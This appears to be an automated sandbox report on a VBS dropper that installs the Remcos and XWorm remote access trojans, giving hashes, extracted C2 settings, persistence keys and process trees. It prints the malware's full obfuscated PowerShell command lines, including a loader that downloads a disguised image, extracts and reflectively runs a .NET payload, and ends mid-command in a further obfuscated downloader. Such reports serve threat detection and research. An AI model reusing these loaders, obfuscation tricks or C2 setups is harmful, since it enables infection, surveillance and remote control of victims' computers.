remcos | 7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8

General

Target

7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8.vbs
Size

155KB
MD5

b280a8bc4f8a6540a76abf5a10195e51
SHA1

833903eb2385c0703ba081eb24c3b6654859452b
SHA256

7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8
SHA512

6bbf9ada7d0af0c366a96b8b626dbb9479c02e24c3005403bfe890c8ac268cd9bef2b641ff266745521779907757acfaa44dcd106ace2ebe3ae0bfe9b6d104ec
SSDEEP

1536:IbruDZJuZJd99CObitCocEW1aJK66n5yhtW0/5JpWnQcoVd9owng0B3bUZlu9gIo:sruDZJuZJdI9JK6X/fcoVd99ng0B3cn

Score

10^/10

remcos xworm remotehost execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

mayxw9402.duckdns.org:9402

Mutex

ZyV5MqKosTk3Hzpr

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Extracted

Family

remcos

Botnet

RemoteHost

C2

reco8100may.duckdns.org:8100

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KZIWQS
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/820-34-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 6 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

flow pid process

3 1096 WScript.exe
6 1096 WScript.exe
8 1096 WScript.exe
14 3980 powershell.exe
34 3980 powershell.exe
63 4164 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2556 powershell.exe
3980 powershell.exe

flow	pid	process
3	1096	WScript.exe
6	1096	WScript.exe
8	1096	WScript.exe
14	3980	powershell.exe
34	3980	powershell.exe
63	4164	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeRegAsm.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

RegAsm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk	RegAsm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk	RegAsm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\decaprotia.vbs"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Operose% -w 1 $Slettetasternes=(Get-ItemProperty -Path 'HKCU:\\Rosenvandet\\').Bladknopperne;%Operose% ($Slettetasternes)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
3 pastebin.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2988 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

4492 powershell.exe
2988 wab.exe

flow	ioc
1	pastebin.com
3	pastebin.com

pid	process
2988	wab.exe

pid	process
4492	powershell.exe
2988	wab.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process	target process
PID 3980 set thread context of 820	3980	powershell.exe	RegAsm.exe
PID 4492 set thread context of 2988	4492	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

RegAsm.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings RegAsm.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1164 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	RegAsm.exe

pid	process
1164	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exe

pid	process
2556	powershell.exe
2556	powershell.exe
3980	powershell.exe
3980	powershell.exe
820	RegAsm.exe
4164	powershell.exe
4164	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

4492 powershell.exe

pid	process
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	820	RegAsm.exe
Token: SeDebugPrivilege	4164	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

RegAsm.exewab.exe

pid process

820 RegAsm.exe
2988 wab.exe

pid	process
820	RegAsm.exe
2988	wab.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

WScript.exepowershell.exepowershell.exeRegAsm.exeWScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1096 wrote to memory of 2556	1096	WScript.exe	powershell.exe
PID 1096 wrote to memory of 2556	1096	WScript.exe	powershell.exe
PID 2556 wrote to memory of 3980	2556	powershell.exe	powershell.exe
PID 2556 wrote to memory of 3980	2556	powershell.exe	powershell.exe
PID 3980 wrote to memory of 3692	3980	powershell.exe	cmd.exe
PID 3980 wrote to memory of 3692	3980	powershell.exe	cmd.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 3980 wrote to memory of 820	3980	powershell.exe	RegAsm.exe
PID 820 wrote to memory of 808	820	RegAsm.exe	WScript.exe
PID 820 wrote to memory of 808	820	RegAsm.exe	WScript.exe
PID 820 wrote to memory of 808	820	RegAsm.exe	WScript.exe
PID 808 wrote to memory of 4164	808	WScript.exe	powershell.exe
PID 808 wrote to memory of 4164	808	WScript.exe	powershell.exe
PID 808 wrote to memory of 4164	808	WScript.exe	powershell.exe
PID 4164 wrote to memory of 4788	4164	powershell.exe	cmd.exe
PID 4164 wrote to memory of 4788	4164	powershell.exe	cmd.exe
PID 4164 wrote to memory of 4788	4164	powershell.exe	cmd.exe
PID 4164 wrote to memory of 4492	4164	powershell.exe	powershell.exe
PID 4164 wrote to memory of 4492	4164	powershell.exe	powershell.exe
PID 4164 wrote to memory of 4492	4164	powershell.exe	powershell.exe
PID 4492 wrote to memory of 2208	4492	powershell.exe	cmd.exe
PID 4492 wrote to memory of 2208	4492	powershell.exe	cmd.exe
PID 4492 wrote to memory of 2208	4492	powershell.exe	cmd.exe
PID 4492 wrote to memory of 2988	4492	powershell.exe	wab.exe
PID 4492 wrote to memory of 2988	4492	powershell.exe	wab.exe
PID 4492 wrote to memory of 2988	4492	powershell.exe	wab.exe
PID 4492 wrote to memory of 2988	4492	powershell.exe	wab.exe
PID 4492 wrote to memory of 2988	4492	powershell.exe	wab.exe
PID 2988 wrote to memory of 2444	2988	wab.exe	cmd.exe
PID 2988 wrote to memory of 2444	2988	wab.exe	cmd.exe
PID 2988 wrote to memory of 2444	2988	wab.exe	cmd.exe
PID 2444 wrote to memory of 1164	2444	cmd.exe	reg.exe
PID 2444 wrote to memory of 1164	2444	cmd.exe	reg.exe
PID 2444 wrote to memory of 1164	2444	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTredwB4DgTreHkDgTreYQBtDgTreC8DgTreYQByDgTreGEDgTreegDgTrevDgTreGcDgTrecgBvDgTreC4DgTreZQBjDgTreG4DgTreZQBpDgTreGMDgTrecwBsDgTreGEDgTrebgBvDgTreGkDgTredDgTreBhDgTreHDgTreDgTredQBjDgTreGMDgTrebwBqDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBjDgTreGEDgTrecDgTreByDgTreG8DgTredDgTreBpDgTreGEDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.wxyam/araz/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'decaprotia','RegAsm',''))} }"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\decaprotia.vbs"
4⤵
PID:3692

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:820

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sqmtry.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Housewrecker='Sub';$Housewrecker+='strin';$Devoteeism = 1;$Housewrecker+='g';Function Swilled($Skamferingernes220){$Elokvent=$Skamferingernes220.Length-$Devoteeism;For($Rottefrit=5;$Rottefrit -lt $Elokvent;$Rottefrit+=6){$Agnostiker186+=$Skamferingernes220.$Housewrecker.Invoke( $Rottefrit, $Devoteeism);}$Agnostiker186;}function Dentata($Tortoises){ . ($Rabarberkvarterer) ($Tortoises);}$Filthified194=Swilled 'KolacMminiroGods zReenuiUddellmetodl,rchpasapou/In sp5Fo de.Clo r0Tig,e Ovato(.ologWVarmeiAl isnBasked Sa,do DispwCatawsKurse AnalyN Edi TMilie P,yt1,nsha0Multi.colla0 Outs;Tekst AfsvWuvejriServinEk po6Anthe4int.r; Skr, Genmax Ingr6Over 4Under;Bou,g .permrHeksevTomat:Inieb1Udtry2Gylde1T gte.Komma0Since)Alumi StenGVoldgeindv cI cenk R.nto,mper/Vens,2 Pr,c0 agg1T.edj0Ba ls0Pro e1Hekse0Kron 1 Part Phil.FSlavoiForflrtenaceNon lfE tero MacrxM ure/Heter1entre2Viden1vagin.T lsy0p eci ';$Tenorite=Swilled 'Re viUPallesSnappeHermerPaste-SkaanAachilgThymaeTuckenSalgstFjerb ';$Heltindes=Swilled 'ViskehPengetWays tPhysep hitesJdeki:Livel/Benga/Meth.tPerr a Se.rtPhlegsImbareSandwlSkalpeM,sbocsp rstEmigrr,eneroKagemn Mil iForebc EstrsFremd. Berec AlymoAnven.Den mzC.nvawSleyi/Nons.sSt dsdIn fa/ Ko.fKRein rAfskiuS.ippb.yggeiPy,am.Tigerm.oltasCau.eomagni ';$Elkslip=Swilled 'Stolz> Forp ';$Rabarberkvarterer=Swilled 'a endiNoncoeRedefxCrapu ';$Handelsuddannet123='Egyptologernes';$faksimilet = Swilled 'Elekte B nkc NglehKomm.oPtyal edva%SkomaaBlottpSpisepAfsl.d BuffaFladptHe.mea.rmin% ffe\EfterH BirkeI,divmB nzaaCrumbtWeedeoVerdebAtolmropretaResonnBispec Pr,shC.rkuiMuni.aTilsytDiscoe Pho..NdvrgE HydrnCowagfSad m omeo&Uvaer&Flerv MuseeAfridc I.deh.oxalo Nrin C,ntat Oron ';Dentata (Swilled ' Syst$Fedlag StralIsmejoMaksibZygota annelStipi:Stet,T Middh rd peSpildrRep ei Bolia WititShindrPorioiStenscSu ersS eez=Lufth(HacktcJacuamMariodTorst Ref,r/PentycPromi P rio$kommef oresa Koekk Fe asUnderikonf mKageri abetlimpededisaltpecul)Lunkh ');Dentata (Swilled ' 